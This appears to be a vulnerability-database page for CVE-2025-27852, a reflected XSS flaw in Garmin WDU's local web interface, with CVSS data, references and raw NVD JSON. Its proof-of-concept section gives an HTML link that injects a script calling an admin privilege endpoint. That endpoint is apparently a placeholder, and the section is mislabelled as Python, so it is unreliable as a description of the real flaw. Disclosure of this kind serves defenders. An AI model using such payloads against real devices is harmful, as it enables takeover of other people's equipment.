CVE-2025-27852

Description

The locally served web site on the Garmin WDU (v1 1.4.6 and v2 5.0) allows a reflected cross site scripting (XSS) attack. This allows an attacker on the local network segment to execute arbitrary JavaScript code within the context of the WDU webpage. Full administrator level access to the device is possible. To initiate an exploit of this vulnerability, the victim must execute two actions: (1) view a specific URL served by the WDU, and (2) click an element on the rendered page.

CVSS Details

CVSS Score

5.0

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Garmin WDU v1 1.4.6

Garmin WDU v2 5.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!--
PoC Concept for CVE-2025-27852
Description: Reflected XSS requiring user interaction (Click).
Target: Garmin WDU Local Web Interface
-->

<html>
<body>
<h2>Garmin WDU XSS PoC</h2>
<p>This page demonstrates the exploit vector. The victim must click the button below.</p>

<!-- Simulating the vulnerable endpoint behavior -->
<a href="http://<WDU_IP>/vulnerable_page?input=<script>alert('XSS');fetch('/admin/grant_privilege')</script>" target="_blank">
    Click here to view WDU status (Trigger Exploit)
</a>

<script>
// Explanation:
// 1. Attacker sends this link to the victim on the local network.
// 2. The 'input' parameter is reflected unsanitized in the WDU response.
// 3. The script tag executes, potentially calling internal APIs to grant admin access.
console.log("PoC structure generated for local network delivery.");
</script>
</body>
</html>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-27852
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-27852
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-27852/
[4] VulDB https://vuldb.com/cve/CVE-2025-27852
[5] https://garmin.com
[6] https://www8.garmin.com/support/ch.jsp?product=010-02642-00

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-27852", "sourceIdentifier": "[email protected]", "published": "2026-05-13T21:16:41.350", "lastModified": "2026-05-14T17:06:08.693", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "The locally served web site on the Garmin WDU (v1 1.4.6 and v2 5.0) allows a reflected cross site scripting (XSS) attack. This allows an attacker on the local network segment to execute arbitrary JavaScript code within the context of the WDU webpage. Full administrator level access to the device is possible. To initiate an exploit of this vulnerability, the victim must execute two actions: (1) view a specific URL served by the WDU, and (2) click an element on the rendered page."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://garmin.com", "source": "[email protected]"}, {"url": "https://www8.garmin.com/support/ch.jsp?product=010-02642-00", "source": "[email protected]"}]}}